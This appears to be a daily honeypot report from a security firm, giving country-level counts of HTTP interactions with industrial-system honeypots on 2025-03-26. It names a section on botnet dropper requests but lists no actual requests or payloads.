
Report: 2025-03-26

Author
Shoggoth Industries

Daily Report: 2025-03-26

Interaction report on the HTTP service of various honeypots around the world.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

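| source_country | targeted_country |
|---|---|
| CN | Singapore |
| FR | Singapore |
| FR | Australia |
| FR | Dubai |
| US | Dubai |
| FR | Georgia |
| US | |
| US | |
| US | |
| US | |
| US | |
| US | |
| US | |
| US | |
| US | |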

botnet_dropper_behaviour

List of requests with dropper behavior (command execution and implant upload attempts).


request

The requests listed here are those that have not yet been integrated into the request database.


country_iso_code

Number of requests by source country (country mapped from the IP address that queried the honeypot).

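| number_of_occurence | country_iso_code |
|---|---|
| 1627 | US |
| 828 | BG |
| 672 | FR |
| 529 | NL |
| 200 | CN |
| 151 | DE |
| 142 | GB |
| 131 | PL |
| 80 | HK |
| 61 | SG |
| 56 | JP |
| 55 | IN |
| 42 | RU |
| 39 | PT |
| 37 | ES |
| 36 | CH |
| 31 | SC |
| 26 | CA |
| 22 | NG |
| 15 | HR |
| 12 | LT |
| 12 | NO |
| 12 | BE |
| 12 | VE |
| 11 | UA |
| 8 | MD |
| 8 | KR |
| 7 | GH |
| 7 | AZ |
| 6 | HU |
| 6 | TR |
| 6 | IE |
| 5 | ZA |
| 5 | SA |
| 5 | IR |
| 4 | IL |
| 3 | VN |
| 3 | AR |
| 3 | IT |
| 2 | GR |
| 2 | AE |
| 2 | BR |
| 2 | ID |
| 2 | MC |
| 1 | CG |
| 1 | EC |
| 1 | CL |
| 1 | EE |
| 1 | MX |
| 1 | AT |
| 1 | PK |
| 1 | TH |
| 1 | PR |
| 1 | AL |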
